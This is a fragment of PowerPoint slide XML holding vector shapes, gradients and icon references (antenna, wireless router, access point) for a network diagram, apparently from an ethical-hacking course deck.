          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="618" name="Text Box 868"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="8225903" y="3297934"/>
              <a:ext cx="97975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Access Point</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="623" name="Picture 4" descr="Y:\CEH v7 - Haja\Icon Shock\CLEAN\Networking\antenna_256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46525" y="2130941"/>
              <a:ext cx="236160" cy="23616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4" name="Picture 5" descr="Y:\Web2.0 PNG Icons\Signal Vista.png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09022" y="1999600"/>
              <a:ext cx="259777" cy="25977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5" name="Picture 5" descr="Y:\Web2.0 PNG Icons\Signal Vista.png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06170" y="2659144"/>
              <a:ext cx="236160" cy="23616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626" name="Group 877"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="7233320" y="3300091"/>
              <a:ext cx="465583" cy="140176"/>
              <a:chOff x="-240" y="-1656"/>
              <a:chExt cx="3137" cy="940"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="627" name="Freeform 878"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="658" y="-1656"/>
                <a:ext cx="446" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 446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6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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="12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28" name="Freeform 879"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1656"/>
                <a:ext cx="3137" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T1" fmla="*/ 54 h 843"/>
                  <a:gd name="T2" fmla="*/ 898 w 3137"/>
                  <a:gd name="T3" fmla="*/ 0 h 843"/>
                  <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T5" fmla="*/ 120 h 843"/>
                  <a:gd name="T6" fmla="*/ 0 w 3137"/>
                  <a:gd name="T7" fmla="*/ 482 h 843"/>
                  <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T9" fmla="*/ 843 h 843"/>
                  <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                  <a:gd name="T11" fmla="*/ 482 h 843"/>
                  <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                  <a:gd name="T13" fmla="*/ 602 h 843"/>
                  <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T15" fmla="*/ 54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7" h="843">
                    <a:moveTo>
                      <a:pt x="2887" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="898" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3137" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2887" y="54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29" name="Freeform 880"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 97 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 458 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 361 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="36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0" name="Freeform 881"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2448" y="-1174"/>
                <a:ext cx="449" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 449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9" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="12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1" name="Freeform 882"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1104" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 458 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 97 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344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458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458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pic>
          <p:nvPicPr>
            <p:cNvPr id="632" name="Picture 2" descr="Y:\CEH v7 - Haja\Haja Premium Icons\Check Marks\Cross2.png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63603" y="3233138"/>
              <a:ext cx="139435" cy="14416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633" name="Group 940"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="4528217" y="3643191"/>
              <a:ext cx="165207" cy="395495"/>
              <a:chOff x="3885" y="1850"/>
              <a:chExt cx="132" cy="316"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="634" name="Freeform 941"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="3924" y="2002"/>
                <a:ext cx="60" cy="164"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 89 w 90"/>
                  <a:gd name="T1" fmla="*/ 156 h 245"/>
                  <a:gd name="T2" fmla="*/ 90 w 90"/>
                  <a:gd name="T3" fmla="*/ 7 h 245"/>
                  <a:gd name="T4" fmla="*/ 89 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 245"/>
                  <a:gd name="T6" fmla="*/ 63 w 90"/>
                  <a:gd name="T7" fmla="*/ 20 h 245"/>
                  <a:gd name="T8" fmla="*/ 12 w 90"/>
                  <a:gd name="T9" fmla="*/ 10 h 245"/>
                  <a:gd name="T10" fmla="*/ 3 w 90"/>
                  <a:gd name="T11" fmla="*/ 0 h 245"/>
                  <a:gd name="T12" fmla="*/ 3 w 90"/>
                  <a:gd name="T13" fmla="*/ 36 h 245"/>
                  <a:gd name="T14" fmla="*/ 2 w 90"/>
                  <a:gd name="T15" fmla="*/ 205 h 245"/>
                  <a:gd name="T16" fmla="*/ 44 w 90"/>
                  <a:gd name="T17" fmla="*/ 204 h 245"/>
                  <a:gd name="T18" fmla="*/ 45 w 90"/>
                  <a:gd name="T19" fmla="*/ 51 h 245"/>
                  <a:gd name="T20" fmla="*/ 36 w 90"/>
                  <a:gd name="T21" fmla="*/ 39 h 245"/>
                  <a:gd name="T22" fmla="*/ 45 w 90"/>
                  <a:gd name="T23" fmla="*/ 51 h 245"/>
                  <a:gd name="T24" fmla="*/ 44 w 90"/>
                  <a:gd name="T25" fmla="*/ 204 h 245"/>
                  <a:gd name="T26" fmla="*/ 44 w 90"/>
                  <a:gd name="T27" fmla="*/ 211 h 245"/>
                  <a:gd name="T28" fmla="*/ 88 w 90"/>
                  <a:gd name="T29" fmla="*/ 218 h 245"/>
                  <a:gd name="T30" fmla="*/ 89 w 90"/>
                  <a:gd name="T31" fmla="*/ 156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0" h="245">
                    <a:moveTo>
                      <a:pt x="89" y="156"/>
                    </a:move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3" y="170"/>
                      <a:pt x="46" y="55"/>
                      <a:pt x="45" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="47"/>
                      <a:pt x="36" y="46"/>
                      <a:pt x="36" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="46"/>
                      <a:pt x="45" y="47"/>
                      <a:pt x="45" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="55"/>
                      <a:pt x="43" y="170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accent1"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:schemeClr val="accent1">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent1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5" name="Freeform 942"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="3885" y="1893"/>
                <a:ext cx="132" cy="154"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 198"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 198"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 198"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 198"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 198"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 198"/>
                  <a:gd name="T11" fmla="*/ 11 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 198"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 198"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 198"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 198"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 198"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 198"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 198"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 198"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 198"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 198"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 198"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 198"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 198"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 159 w 198"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 198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50000">
                    <a:schemeClr val="bg1">
                      <a:gamma/>
                      <a:shade val="85882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6" name="Freeform 943"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="3931" y="1884"/>
                <a:ext cx="43" cy="28"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 9 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 53 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 30 h 41"/>
                  <a:gd name="T10" fmla="*/ 29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4" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="9" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="21"/>
                      <a:pt x="13" y="16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30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="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7" name="Oval 944"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3928" y="1850"/>
                <a:ext cx="52" cy="52"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="6350" algn="ctr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pic>
          <p:nvPicPr>
            <p:cNvPr id="638" name="Picture 13" descr="Y:\CEH v7 - Haja\Icon Shock\CLEAN\Networking\wireless_router_256.png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86662" y="3027059"/>
              <a:ext cx="345762" cy="34576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639" name="Group 942"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2326375" y="1238466"/>
              <a:ext cx="1486500" cy="558009"/>
              <a:chOff x="3397" y="2848"/>
              <a:chExt cx="1300" cy="488"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="640" name="Freeform 417"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3397" y="2986"/>
                <a:ext cx="1300" cy="350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ACACA"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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641" name="Group 681"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3877" y="2848"/>
                <a:ext cx="133" cy="318"/>
                <a:chOff x="3735" y="3265"/>
                <a:chExt cx="468" cy="1120"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="670" name="Freeform 682"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3853" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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1" name="Freeform 683"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3853" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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2" name="Freeform 684"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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3" name="Freeform 685"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
